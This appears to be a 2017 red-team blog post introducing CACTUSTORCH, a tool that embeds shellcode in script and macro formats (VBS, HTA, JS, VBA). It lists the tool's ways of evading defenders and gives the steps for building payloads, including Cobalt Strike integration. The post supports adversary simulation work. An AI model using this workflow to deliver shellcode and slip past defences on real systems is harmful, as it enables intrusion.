Payload Generation with CACTUSTORCH

Last updated 4 months ago

Note: posted on June 2017

CACTUSTORCH is a framework for payload generation that can be used in adversary simulation engagements based on James Forshaw’s DotNetToJScript tool. This tool allows C# binaries to be bootstrapped inside a payload, providing reliable means to bypass many common defences. Currently CACTUSTORCH supports the following payload types:

VBS

VBA

JS

JSE

WSF

HTA

VBE

Prior to this, it was not possible to invoke shellcode injection directly from multiple formats with the exclusion of VBA macros (more on this later in the post). CACTUSTORCH has a self-contained C# binary which accepts a binary name and base64 encoded shellcode to inject. Additionally, it borrows concepts from @armitagehacker / CobaltStrike’s VBA macro injection whereby it selects the 32 bit executable to inject into.

State of Current Payloads

Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated.

In Metasploit framework the following payload formats work as such:

VBS: File drop and execute — Touches disk.

HTA-PSH: Runs powershell.exe with a WScript.Shell object — Powershell.exe and WScript.Shell are well known to blue team.

HTA-PSH: Runs powershell.exe with a WScript.Shell object — Powershell.exe and WScript.Shell are well known to blue team.

HTA-VBA: Wraps around a VBS that does the weakening, COM object to Excel, macro injection of Kernel32 API declaration VBA code.

Benefits of CACTUSTORCH

CACTUSTORCH offers a number of improvements on current payload generation that are currently beyond the capabilities of the public frameworks:

Does not use Kernel32 API declarations in the payload

Obfuscated within the C# binary

Allows for arbitrary specification of target binary to spawn.

Allows for arbitrary shellcode to be specified.

Does not spawn PowerShell.exe.

Does not require Powershell.

Does not require Office.

Does not invoke WScript.Shell.

Does not require staging as the full stageless shellcode can be contained within the delivered payload.

No static parent to child spawn, the user can change what wscript.exe spawns.

exe spawning Powershell.exe is suspicious, spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries.

Using CACTUSTORCH

Using CACTUSTORCH is relatively straight forward, the following outlines the steps required to generate a custom payload:

Select the payload format you want to use from the cloned directory

Select a binary container you want to inject into, has to exist in both SYSWOW64 and SYSTEM32

Generate raw shellcode for your listener

$> cat payload.bin | base64 -w 0 > out.txt

Copy the out.txt base64 raw payload into the “code” variable of the template

If doing it for the VBA, run the out.txt through vbasplit.py out.txt split.txt

Then copy the split.txt into the code section highlighted in the VBA template. Payload is ready

Do obfuscation if you want

A video demonstrating these steps is shown below:

Integration with Cobalt Strike

As part of the process for streamlining adversary simulation engagements so that more time can be placed into creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to facilitate this.

After loading the aggressor script, the following menu is presented as an option under the “Attack” tab. You can now select the payloads you want to use and options, it will generate the payload and host it for you. In terms of the VBA code, it will be presented in a textbox where it can be copied from and pasted into a Word VBA Macro.

The aggressor script is demonstrated in the following video:

Credits

The scripts, proof of concepts and aggressor script addon is created by Vincent Yiu. We would like to also thank the following people for their contributions: